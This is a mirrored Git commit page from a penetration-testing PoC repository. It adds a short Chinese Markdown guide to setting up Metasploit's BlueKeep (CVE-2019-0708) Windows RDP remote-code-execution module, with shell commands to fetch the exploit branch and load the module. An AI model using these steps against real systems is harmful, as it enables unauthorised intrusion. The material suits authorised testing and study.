mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-11-05 10:43:28 +00:00
Update and rename cve-2019-0708-msf快速搭建.md to CVE-2019-0708-msf快速搭建.md
This commit is contained in:
parent
d4a32d8d1a
commit
f5e09aae77
25
CVE-2019-0708-msf快速搭建.md
Normal file
25
CVE-2019-0708-msf快速搭建.md
Normal file
@ -0,0 +1,25 @@
|
|||||||
|
```shell
|
||||||
|
sudo apt-get install libsqlite3-dev libpq-dev libpcap-dev -y
|
||||||
|
git clone https://github.com/rapid7/metasploit-framework.git
|
||||||
|
cd metasploit-framework
|
||||||
|
git fetch origin pull/12283/head:bluekeep
|
||||||
|
git checkout bluekeep
|
||||||
|
gem install bundler && bundle
|
||||||
|
./msfconsole
|
||||||
|
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
|
||||||
|
```
|
||||||
|
|
||||||
|
> 如果出现如下错误:
|
||||||
|
```shell
|
||||||
|
/usr/local/bundle/bin/bundle:104:in `load': cannot load such file -- /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.16.1/exe/bundle (LoadError)
|
||||||
|
|
||||||
|
from /usr/local/bundle/bin/bundle:104:in `<main>'
|
||||||
|
```
|
||||||
|
可以尝试使用如下命令修复:
|
||||||
|
```shell
|
||||||
|
gem update --system
|
||||||
|
gem pristine bundler
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
> 仅在Debian测试过
|
||||||
@ -1,11 +0,0 @@
|
|||||||
```shell
|
|
||||||
sudo apt-get install libsqlite3-dev libpq-dev libpcap-dev -y
|
|
||||||
git clone https://github.com/rapid7/metasploit-framework.git
|
|
||||||
cd metasploit-framework
|
|
||||||
git fetch origin pull/12283/head:bluekeep
|
|
||||||
git checkout bluekeep
|
|
||||||
sudo gem install bundler && bundle
|
|
||||||
./msfconsole
|
|
||||||
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
|
|
||||||
```
|
|
||||||
> 仅在Debian测试过
|
|
||||||
Loading…
x
Reference in New Issue
Block a user